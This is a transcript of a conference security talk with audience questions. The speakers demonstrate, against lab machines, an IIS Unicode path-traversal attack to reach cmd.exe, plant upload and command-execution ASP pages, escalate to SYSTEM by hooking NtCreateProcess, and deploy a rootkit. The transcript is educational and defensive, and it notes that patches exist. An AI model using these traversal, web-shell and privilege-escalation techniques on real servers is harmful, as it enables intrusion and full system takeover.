slide. Okay, no, go back, jump back. Okay, what we're going to do in this demo is we're going to not do the usual TFTP netcat thing. We're going to go one step further, one more advanced step. Yes, your question. So your question is if the inet pub, or if the web root is not on the same volume as the system root, can we do this? Is that your question? I don't know of a way of doing it so far, no.
But you can't use the percent sign sys there, variable for the system directory.
If we try to use percentage system root percent or something like that, and use URL encoded versions, I've tried it, it doesn't work. It doesn't, it's not that slick. Yes, your question. I don't know, somebody is giving a grin from the back. They may know how to do it, not telling me. Okay, your question.
So if you don't have directories with executable, just script executable, you're not going to run into a lot of these problems potentially?
Script executable directories will run into this problem.
Would it?
It would. Like if you can execute ASP pages, you can do this. If the virtual directory lies in the same volume as your system root and you're able to guess the path out. Like sometimes WinNT is renamed, it's WinNT 4.0 or something, then you'll have to make sure you have to be able to find your way to cmd.exe by pure guesswork sometimes. So let's do this. I'm sorry. Yes, sorry, your question.
Sure, I'm just wondering what it is about the, why you only have to use the Unicode representation of the slash character once, and what it is about the parser that allows you to get away with just saying once and then using slashes for the rest of the URL.
No, okay. Your question is why do we have to use the Unicode character for slash only once? Well, it is just that the scripts directory lies in C inet pub scripts. So you do %C0%AF, so you get to C inet pub. You do a ... and then you get back to the C volume root. Then you're free to go into WinNT system32. If the virtual directory was further nested, you'll have to use multiple C0AF pairs. So it's not just you have to use it once, you have to use it as many times.
For every time you're recursing up the directory tree, you must use that version of the slash.
Yes.
Got it.
Everything on the left-hand side of the question needs the Unicode stuff. Everything on the right-hand side of the question can be anything.
No, because the question comes after 3 forward slashes, also after the Unicode stuff.
See, only when you are using ... you shouldn't use the slash character because that gets parsed out of the URL and just the directories get collapsed. It's just when you use this representation, it keeps the ... slash string unbroken in URL parsing. That's half-baked explanation, but that's true. Okay. What we're going to do in this attack is we're going to assume that the firewalls are locked down, so only port 80 is allowed incoming, no outbound access, only replies can go out, and nothing else, no TFTP, no netcats, nothing. And we want to get an interactive command access, just one way. So what we're going to do is we're going to use a pretty crafty little technique. Somebody posted this technique recently on BugTrack. If I might be allowed to brag, I knew of it first, but I'm trying to modestly brag over here. But
I can vouch for that. It was very cool.
So there you go, JD. Thanks, man. So let me go and show you the tricks.
While he's getting that ready, I have a story. We were doing that for a client, and we did this trick for a client, and we took the, after it was all over, we got some information from the client. You can all hear me all right? Okay. And we took using this trick, we then took the CEO of the company outside of the company, so he was physically outside of his company, and he looked back, through a web browser at the information that we'd taken from outside of his company, and he just went ballistic. It was very good for us. The thing was is they just got done installing like $250,000 worth of Checkpoint 1 firewalls and all this stuff, and he wanted to go put a post cancellation. He wanted to go cancel his check.
Okay. So over here I have what I'm going to do is, since we can target cmd.exe through the web, we are going to make HTTP post requests and post standard input to cmd.exe. We're going to post 20 lines of input at a time. So effectively, we'll get 20 commands run at once. I have a file called createAllEcho.txt, which is actually an ASP file. There's multiple echo commands that just, like over here, you can see echo dim field greater than upload to.asp. Like there's 300 commands in here. So this thing is going to execute 15 times, post 20 commands at once, and we'll recreate an ASP page on the target server. We still have iUser privileges, so we'll be able to dump the page in that directory if it's out of the box install. So we'll go create upload.asp, and this page allows us to upload any binary file on the server. And then we'll keep on widening that hole and crawl right through it. So I have a quick Perl script to do the whole thing. I have post Unicode. I just give the URL 10.0.0.12 scripts .c0af /winnt system 32 cmd.exe, and over here I just give the file that I want to dump. So notice over here it's zipping through. Wow, it went through pretty fast. Created the whole file with multiple echo commands. You can see over here. Here's when cmd.exe gets run. You have all these commands over here. And now let's just browse through this one. We have http 10.0.0.12 scripts upload.asp. And voila, the ASP page is there. Allows me to upload 10 files at a time. So
Come on, this is like the Cadillac of hacking. I love this trick.
So let me upload, what shall we do? We'll upload another page called aspexec.asp. We'll upload a little DLL component with that called aspexec.dll, which we will remotely register with system privileges. And we will upload something completely new, fsys.exe. GD, you want to talk about fsys a little bit?
Fine, man. Go ahead.
Okay, so flip the slide, please. We're going to upload fsys, which is a privilege escalation attack, heightened security awareness, as we call it. It allows us essentially to execute commands in system context. I think you're best suited to talk about this one.
Okay.
Hey.
Well, why don't you talk about how you use it, and then I'll tell them what it does.
Okay, you tell them what it does, and I'll set it up.
This way this works? Okay. Saumil needed a way to escalate privilege to go from iUser to system, so I made him this little tool that does that. Hey, is Todd Sabin here in the room? No? He had a really cool thing called HK. It's much cooler than mine. But this...
Here's the way it works. You know, whenever I'm stuck, whenever I need something, I'll call up JD on the phone, say, JD, can you fix me something that goes from iUser to system? JD says, okay. JD, can you fix me something that detects rootkit? JD says, okay. Anything I ask, all the man says, okay. So it's wonderful. Give him a hand. Great job.
What this does is this makes use of a technique called NT API interception. Basically what we want to do is the kernel has to make calls to itself and all of its internal functions to get things done. So what we want to do is intercept that process and divert it, make our own modifications, and then forward our call back to the other system. So what it allows us to do is perform a privilege escalation attack. Allows us to get past some of the IIS restrictions that were in the gets us out of the sandbox that we're in. Again, uses this API interception technique, and then once we've done that, the system is now tricked into thinking that we're the system and we're no longer the iUser account. When do you want to run the thing?
I'm running it now.
This is the part we haven't rehearsed yet. Okay, go ahead.
So I'm going to run the exploit now. He's just talked to you a little bit about fsys. I have uploaded 3 files. Beg your pardon?
Well, we're going to talk about that in a second. That's actually not true. We're going to talk about that in a second.
Okay. We have uploaded this. This is NT4 right now. And let's see what we got. We still have one step remaining. We want to register aspexec.dll as a COM object so that the script aspexec.asp can make calls to it and run commands. And we're going to use fsys to register this thing as system. So we'll be able to make commands as system. Again, I go to this thing. I use post Unicode, and I'll actually have another version called post CMD, which just does a couple of commands at a time. And I'm going to run ASP register. Excuse me. I run this one. And the commands executed over here are fsys cmd.exe /c copy the DLL over to WinNT system32.
This is on NT4 box, right?
Yeah, this is an NT4 box. And do fsys and then do reg svr32 to register the DLL. And we're all set. Now all we have to do is browse over to scripts aspexec.asp, and we just have a prompt over here. We have a field. We type any command we want. We hit run. It runs. So we type ipconfig/all. It runs. So here's our interactive command prompt. Well, semi-interactive, as good as it gets, all through one way over port 80. I can upload more tools if I want. I'll just do upload.asp. I'm going to upload who am I, just to show system privileges. Upload it over here and go to aspexec and run it. And I'm just going to run c inetpub scripts whoami.exe, and it says I'm NT authority system. So I pretty much own this system remotely. Todd Sabin's tool also did the same thing. Well, Todd Sabin's tool does privilege escalation as well for NT4. So instead of fsys, you can use that one and get to the same effect. Now we're going to talk about doing the same thing on Windows 2000. And let me just prep up to it. Let me just run the Unicode and create the same forms over there. So I'm going to use the same technique. 10.00.10. Actually, I'll have to this is oh shit, say secure channel required. I had to set up a redirector. You want to talk about fsys for that part?
Okay,
and I'll just prep this up. Oops.
One of the things that LeBlanc was bringing up in the back is this attack works by default against NT4. I have the privilege that I need to be able to run this interception attack. It doesn't work by default on Windows 2000 because the debug privilege has been restricted to only the administrator account. However, there are a lot of people, I know specifically 2 of our clients, that they don't make other people admins, but they do pass out the debug privilege, especially to e-commerce developers, other developers who are making their online system. So it doesn't work by default. You do have to hand it out, but we do find it, and it's common enough to get us in, whereas before, the Unicode thing would always fail to not give us enough privileges to do what we wanted, where now we can probably get in about maybe 30% of the time.
This server had a little curve thrown in. It was running only SSL, like it was just denying all web requests which were not SSL. So I just set up a quick SSL redirector, so it does all the forwarding, just as an example. So now instead of attacking 10.0.0.10 directly, I'm going to attack 10.0.0.3, which will pass on all the requests to 10.0.0.10. So let me do that now. I'm going to run the same program instead on 10.0.0.3. So, okay, there it goes, created everything. And now I'll go to 10.0.0.10 scripts upload.asp. Oops, secure channel required. Yeah, let's give HTTPS. Continue. By gosh. Well, something's gone wrong. No, it's not a backslash issue. Hang on, this is address, and let me just turn on that whole secure thing required off for now, so we can go ahead with a quick demo. Just give me a second over here. Just a second. Let's say this turned off. Okay. With this, let's see if it works. Sorry about that. Oh, it still crashes on us. We got a problem. Exploits don't scale well.
Is anybody here from the NT sniffing class yesterday? Okay, you guys saw this, so you can at least verify it worked.
Okay, let's just go to the quick next slide. You talked about this thing,
All right,
though.
if you want to look at that, I'll talk about this for a second.
Okay.
Sure. The tool HK only works on NT4. We need something that worked on Windows 2000, so I started work on this FSys tool. There is a caveat. It currently does require the debug privilege, however, I'm working on figuring out a way to bypass that. Usually, only admin has that privilege by default. In Windows 2000, debug privilege doesn't get assigned to any other accounts. However, we have found, especially with e-commerce systems, instead of putting people in the administrators group, they just hand out the debug privilege.
They are making people in administrative group. Same thing.
Well, it's just, the way people configure their systems, It's I am trying to say that by default it's fine. I'm saying other people, open it up in a way that they don't think that it's open, but it still is. So, it doesn't get us in all the time, but it gets us in sometimes. When I fix that and I get to 100%, you'll be the first person I tell Dave, I swear. I love Dave, he's a great guy. Him and I get in the most heated arguments. I have no idea why, but it's a war, I guess. Basically, the way it works is FSys loads NT DLL, grabs and stores the NT API NT create process. For those who don't know, NT actually has two APIs. There's the Win32 API, which is the programming API, and then there's the native NT language, which is the NT API. The NT API is a Unicode, almost 100% Unicode API, processes all strings as Unicode. The Win32 API has two versions of function calls that take either Unicode or ASCII strings. Whenever you call a Win32 API function, it just does a little bit of processing and then turns right around and calls the NT equivalent NTI call. So then what I do is I create my own arbitrary fcreate process. And once I have the address of NT create process, I write the address of my process to where the original NT create process was. What that serves to do is then any calls to that address get rerouted to my function. And then I basically have control over that and I can do what I want. I use some inline assembly language to modify the stack parameters and then forward the call back to the original. Here's kind of what it looks like in code. This is the top one, get proc address, is a Win32 function call, which gives me the hook is actually a pointer to the function NT create process. And then I make a couple calls called virtual query. Gives me some information about where that is located. And then basically what I want to do is I want to do virtual protect, and I want to change the memory protection instead of just read only to read write. Then down below you'll see I'm taking my address for the function I created and I'm modifying that system address, that hook pointer address thing. Then in my call, I want to, this app I want to run, I call the Win32 function create process. And what that does is that turns right around and calls the NT create process function, which gets rerouted to mine. And that's pretty much the way it works.
Okay. For some reason, upload.asp refuses to work, but we'll do a little workaround. We'll go and do the command prompt thing instead. So excuse us for that one. Yes.
HK.exe can be prevented by applying the security patch. What about F? Besides not assigning debug privilege?
I don't know. I haven't played around enough with it yet to know, what actually defeats it, or what you can take. Mostly, all it takes is the ability to read or to write to a memory address that usually just has read protection on it. So there's probably several ways you can get around it. I'm currently using one way to get to it, but there's several ways to try and get that privilege. Dildog just came out with a new DDE thing, exploit. So I haven't taken a look at that yet to see how he's doing it. So what may currently work today may not work tomorrow, but I haven't explored that issue enough myself. I just kind of came up with this, so I don't know what steps you can take to lock it off besides just not having the debug privilege.
If you're modifying the operating system, which you are, this is a neat thing, it's a neat technique, I'll certainly grant you that. But it's an awful lot of trouble to go to just to add IDs to the administrator's group. You could do the same thing much more directly with the privileges that you've got. You just open a process that's running as local system, inject a thread in it, boom, boom, bam, off you go. There's a lot simpler ways to accomplish the same.
There probably is. This FSIF is only probably about 25 lines of code. HK is much more elegant. I think it's 300 lines of code. I was looking at it the other day, and there's several ways. LeBlanc got his way, Todd Saban's got his way. Dildog's got his own couple ways. So.
The important thing is debug access. Debug rights is equivalent to administrator access. And I'm astonished that people don't understand that.
Many people don't. It's just a fact. Just to back up your point, I don't know any security book that people read to get knowledge. You're an exclusion, so I can't count you. I'm just going to pretend you don't exist because you're just. But for all the other plethora of admins out there who are just getting normal education, if you read NT security books, I don't know any that talk about that issue. They say don't put. Maybe I'm wrong, but I wouldn't consider it broad administrator knowledge.
It may need to be, that knowledge may need to be spread better.
So our user needs to be debug privilege.
What's that?
Our user needs to have debug privilege.
Only for debugging certain things, like for applications, it gets it sometimes, but by default it doesn't have it.
For this operation?
Yes, it does.
Okay, we're also,
Just to expand on the point a little bit about what's patched and what's not, you're running on an unpatched machine, right?
Are we running on a patch machine?
yes, we're running on unpatched machines.
Yes.
Is there anything that you've described that there is not a patch for?
Not patch for.
Not a patch for, no,
Yeah.
not right now.
There's a patch for all of these, right?
Well, the debug privilege isn't something to patch. I mean, by default, Windows 2000 is.
Yeah, that's a excluding that, yes, there's a patch for everything. Yes.
Third-party products that you talk about, WebSphere and some of the others, are there patches for those from?
Yes, all of those are patched.
Yeah.
Yeah, we-
Contacted the vendor first.
We worked with them. It was a struggle, but they got it patched. Okay, I'm going to zip through a little bit. We're running somewhat out of time. But what I did is I went back and cheated. Instead of upload.exe, I just copied all the binaries over that we needed for the talk really quick. And I got a connection back as iUser, so we'll proceed from there. Just to do who am I? I'm iUser on this system. And now I'm going to run fsys and just do who am I.exe. And because this has the debug privilege, it shows me I'm in the authority system. Next slide. Can we snag a few more minutes?
What's that?
Can we snag a few more minutes into the talk?
We're not saying.
No.
Just keep going. Just
Okay,
talk about it.
go ahead. Next slide, please. Okay, and we're going to quickly demo something that's going on in the other section, Hoagland's rootkit. What we want to do is install the rootkit on this system, because now we have ability to run code as system. We want to install the rootkit and show you quickly some tricks. So over here I have the rootkit files with me. I just use deploy.exe, installs the rootkit on there. The file root.sys is actually the NT-rootkit. It's deployed, and right now the rootkit is active. Next slide.
Hey, I just want to interrupt just for a second while I'm thinking about it. Going back to what Dave was saying about debug privilege, there is an advantage. Like one particular company I know that we were working with that gave debug privileges to people, specifically developers that were building their e-commerce engine. Is that it does give you power on that local machine, but it doesn't give you other things like whether you're in the domain administrators group. If you're a local developer working on a commerce machine with the debug privileges, yeah, you can it gives him the privilege that he needs to work with that box, but it doesn't give him other things. Put him in the admins group, give him access to other things. Sure, it gives him the ability to escalate himself, but it doesn't violate the company policy of putting him in a more powerful group than he needs to be in. So whether that's good or not, I don't know, but that's their reasoning of why they did it, and it's a fairly valid reason, I think.
We just have to talk about the rootkit a little bit.
Okay, we probably have about like 15 more minutes to talk, and you guys, there's a break.
No, the break is 10 minutes now. Into it.
Oh, 10 minutes into it. Okay.
Okay.
The food's going to be gone.
All right.
Okay. Well, what we wanted to talk about, we just 1 minute into the slides. We wanted to talk about the NT rootkit. We're not going to be able to give you a demo, but the rootkit basically does file hiding, process hiding. It hides processes listening, and has a keyboard sniffer. We wanted to just plug the new tool that we have called Vision, which detects all these stealth tricks. It detects the rootkit running, even if it does not appear in the task manager, and it detects any other processes that are spawned off by the rootkit. So, oh well, it's a quick, hurried, mixed up plug for a demo that got jinxed in the end. Oh well. So that was all, and root causes of web hacks. Let's
Wait,
go.
no, you got to show the picture. Wait. Pop up that picture.
Okay.
All right, for those that don't know, Dave LeBlanc has a passion for riding horses, and he's talked Eric Schultz. If you know him, he's a great set guy, and so they to get away from the world, they go out riding horses together. So my tribute to the two of them is coming up.
There it is.
There you go.